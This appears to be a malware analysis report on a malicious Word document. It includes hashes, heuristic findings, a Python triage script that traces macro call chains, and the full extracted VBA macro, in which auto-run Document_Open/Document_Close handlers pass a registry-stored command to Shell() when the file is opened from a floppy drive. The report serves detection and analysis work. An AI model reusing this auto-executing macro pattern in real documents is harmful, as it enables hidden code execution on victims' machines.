Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72ced042937967d4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 42.0 KB
Created: 2001-08-15 01:42:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 3f309c7d154e0cb7a3e29097e9c8c09d
SHA-1: 34053c8a9793a09bb69bfa7d938aa36c62298ff4
SHA-256: 72ced042937967d417687cdcc0a85c0f5abc64d67540906043f2714ae854e9b7
Risk score: 160

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros in two modules, ThisDocument and Functions. ThisDocument defines two auto-execution handlers, Document_Open and Document_Close, and both call MSWordProcedure, which ends in a call to the VBA Shell() function, so an external program is launched when the document is opened or closed. Two conditions gate that launch. First, MSWordProcedure takes ActiveDocument.FullName and continues only if its first character is 'A' or 'B', that is, only when the document is opened from a floppy drive; opened from any other location (a hard disk, a network share, a temporary attachment folder) the macro does nothing. Second, the command passed to Shell() is not embedded in the document: ReadPath() in the Functions module reads it from the registry value HKEY_LOCAL_MACHINE\Software\Ktulu\App through RegOpenKeyEx and RegQueryValueEx, declared from advapi32.dll. The macro never writes that value, so the document acts as a trigger for a payload that some other component must already have registered on the host. If the value is absent, the lookup returns Empty and Shell() is handed an empty string; the resulting runtime error is swallowed by the On Error Resume Next that every procedure begins with. Note also that the key is opened with a write-capable access mask (KEY_ALL_ACCESS, defined here as &H3F), which a non-administrative user cannot obtain on an HKLM key with default ACLs, so a sandbox that runs Word as a standard user will not reach Shell() even when the value is present. The combination of auto-execution handlers, a registry-supplied command line and Shell() is a strong indicator of malicious intent; any dynamic analysis of this sample should be run from an A: or B: path, as an administrator, with the HKLM\Software\Ktulu\App value seeded.

Heuristics (4)

  • VBA macros detected (severity: medium, 3 related findings) OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    The macro source calls the VBA Shell() function, which launches an external program.
  • Document_Open macro (severity: high) OLE_VBA_DOCOPEN
    The macro defines a Document_Open handler, which Word runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches macro documents where only p-code is present, or where source extraction fails, so that the visible source is unavailable or cannot be trusted (the situation VBA stomping produces).
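Added example for this report (not the analysis tool's code and not the sample's): a Python triage script that applies the source-level checks behind the findings above (auto-exec handler, Shell() call, execution tokens) and adds the step the summary relies on, resolving calls between procedures. A check that only looks inside the Document_Open body would miss this sample, because Document_Open merely calls MSWordProcedure, and that is where Shell() sits; following the call graph shows the Document_Open -> MSWordProcedure -> ReadPath() -> QueryValue() chain. The MACRO text is an excerpt of the carved macros.bas shown under Extracted artifacts; the token lists, the function names and the simplified registry and privilege model in shell_argument() are this example's own assumptions.

```python
"""Added example (not the analysis tool's code, not the sample): static triage of decoded
VBA that resolves calls between procedures, so a Shell() reached via Document_Open ->
MSWordProcedure is found, plus a model of the gate that decides whether Shell() fires.
MACRO is an excerpt of the carved macros.bas on this page; the token lists, function
names and the registry/privilege model in shell_argument() are assumptions of this example."""
import re
from collections import deque

# Excerpt of the page's extracted macro (ThisDocument and Functions modules, trimmed).
MACRO = r'''
Private Sub Document_Close()
MSWordProcedure
End Sub
Private Sub Document_Open()
MSWordProcedure
End Sub
Public Sub MSWordProcedure()
On Error Resume Next
Dim szFullName As String
Dim szPathName As String
szFullName = ActiveDocument.FullName
If UCase(Left(szFullName, 1)) = "A" Or UCase(Left(szFullName, 1)) = "B" Then
 szPathName = ReadPath()
 Shell szPathName
End If
End Sub
Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
On Error Resume Next
lReturn = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
End Function
Public Function ReadPath() As String
On Error Resume Next
ReadPath = QueryValue(HKEY_LOCAL_MACHINE, "Software\Ktulu", "App")
End Function
'''

# Assumed, partial lists (lower-case): handlers Office runs unprompted, and tokens that run or fetch code.
AUTOEXEC = {"document_open", "document_close", "autoopen", "autoclose", "autoexec",
            "auto_open", "auto_close", "workbook_open"}
EXEC_TOKENS = {"shell", "createobject", "getobject", "urldownloadtofile", "winexec",
               "createprocessa", "shellexecutea"}
PROC_RE = re.compile(r"^[ \t]*(?:Private\s+|Public\s+)?(Sub|Function)\s+(\w+)(.*?)^[ \t]*End\s+\1\b",
                     re.IGNORECASE | re.MULTILINE | re.DOTALL)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
REG_RE = re.compile(r'"((?:SOFTWARE|SYSTEM)\\[^"]+)"\s*,\s*"([^"]*)"', re.IGNORECASE)


def parse_procs(src):
    """Procedure name -> body text for every Sub/Function (Declare lines are not procedures)."""
    return {m.group(2): m.group(3) for m in PROC_RE.finditer(src)}


def strip_literals_and_comments(body):
    """Blank string literals and ' comments so their text is not mistaken for code tokens."""
    return re.sub(r"'[^\n]*", "", re.sub(r'"[^"\n]*"', '""', body))


def call_graph(procs):
    """name -> set of other parsed procedures whose name appears as an identifier in the body."""
    by_lower = {n.lower(): n for n in procs}
    graph = {}
    for name, body in procs.items():
        idents = {i.lower() for i in IDENT_RE.findall(strip_literals_and_comments(body))}
        graph[name] = {by_lower[i] for i in idents if i in by_lower and by_lower[i] != name}
    return graph


def exec_tokens_in(body):
    """Execution tokens present in one procedure body (whole-word, case-insensitive)."""
    clean = strip_literals_and_comments(body).lower()
    return {t for t in EXEC_TOKENS if re.search(r"\b" + re.escape(t) + r"\b", clean)}


def trace(procs, graph):
    """Per auto-exec entry point: procedures reachable from it (BFS order) and the exec
    tokens each contains. A check confined to the handler body would miss this sample."""
    findings = {}
    for entry in procs:
        if entry.lower() not in AUTOEXEC:
            continue
        reached, tokens, queue = [], {}, deque([entry])
        while queue:
            cur = queue.popleft()
            if cur in reached:
                continue
            reached.append(cur)
            found = exec_tokens_in(procs[cur])
            if found:
                tokens[cur] = sorted(found)
            queue.extend(sorted(graph[cur]))
        findings[entry] = {"reaches": reached, "exec_tokens": tokens}
    return findings


def registry_refs(src):
    """(subkey, value name) pairs passed as adjacent string literals, as in ReadPath()."""
    return REG_RE.findall(src)


def shell_argument(full_name, hklm, can_write_hklm):
    """Model MSWordProcedure's gate: return what Shell() receives, or None if nothing runs.
    hklm stands in for HKEY_LOCAL_MACHINE ({subkey: {value: data}}); can_write_hklm models
    RegOpenKeyEx with the macro's write-capable mask (KEY_ALL_ACCESS), which a standard
    user cannot obtain on HKLM under default ACLs (assumption of this model)."""
    if full_name[:1].upper() not in ("A", "B"):
        return None                                   # not on a floppy drive: macro does nothing
    if not can_write_hklm:
        return None                                   # RegOpenKeyEx fails, QueryValue returns Empty
    return hklm.get(r"Software\Ktulu", {}).get("App") or None   # Shell "" errors, swallowed
```

Running trace() over the excerpt reports both Document_Open and Document_Close as entry points that reach MSWordProcedure (where the Shell token is), ReadPath and QueryValue, and registry_refs() recovers the Software\Ktulu / App pair. With a constructed registry seed such as {"Software\Ktulu": {"App": "C:\payload.exe"}}, shell_argument() returns the payload path only for a document path under A: or B: opened by a user who can open HKLM for writing; for a path under C:, or for a standard user, it returns None, which is why the sample stays inert in most sandboxes.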

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3719 bytes
SHA-256: cc5c4bc89439a3fcdbaf9f7bd3cd1bc97a3796e0a17a7af8b35fbd45ba63e62a

Extracted script (the report shows at most the first 1,000 lines; this script is shorter and appears in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Please don't edit these lines,
' can occasion an erroneous functioning of the application.
' Por favor no edite estas lineas,
' puede ocasionar el funcionamiento erróneo de la aplicación.
Option Explicit

Private Sub Document_Close()
MSWordProcedure
End Sub

Private Sub Document_Open()
MSWordProcedure
End Sub

Public Sub MSWordProcedure()
On Error Resume Next
Dim szFullName As String
Dim szPathName As String

szFullName = ActiveDocument.FullName
If UCase(Left(szFullName, 1)) = "A" Or UCase(Left(szFullName, 1)) = "B" Then
 szPathName = ReadPath()
 Shell szPathName
End If
End Sub

Attribute VB_Name = "Functions"
' Please don't edit these lines,
' can occasion an erroneous functioning of the application.
' Por favor no edite estas lineas,
' puede ocasionar el funcionamiento erróneo de la aplicación.
Option Explicit
Global Const REG_SZ As Long = 1
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE = &H80000002
Global Const ERROR_NONE = 0
Global Const KEY_ALL_ACCESS = &H3F

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long
Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long

Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
On Error Resume Next
Dim lReturn As Long
Dim hKey As Long
Dim vValue As Variant
        
lReturn = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
lReturn = QueryValueEx(hKey, sValueName, vValue)
QueryValue = vValue
RegCloseKey (hKey)
End Function

Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long
On Error GoTo QueryValueExError
Dim cch As Long
Dim lrc As Long
Dim lType As Long
Dim lValue As Long
Dim sValue As String

lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)
 If lrc <> ERROR_NONE Then Error 5
  Select Case lType
   
   Case REG_SZ:
    sValue = String(cch, 0)
    lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch)
    If lrc = ERROR_NONE Then
     vValue = Left$(sValue, cch)
    Else
     vValue = Empty
    End If

    Case REG_DWORD:
     lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch)
     If lrc = ERROR_NONE Then vValue = lValue
    
    Case Else
     lrc = -1
    
    End Select

QueryValueExExit:
 QueryValueEx = lrc
 Exit Function

QueryValueExError:
 Resume QueryValueExExit

End Function

Public Function ReadPath() As String
On Error Resume Next
ReadPath = QueryValue(HKEY_LOCAL_MACHINE, "Software\Ktulu", "App")
End Function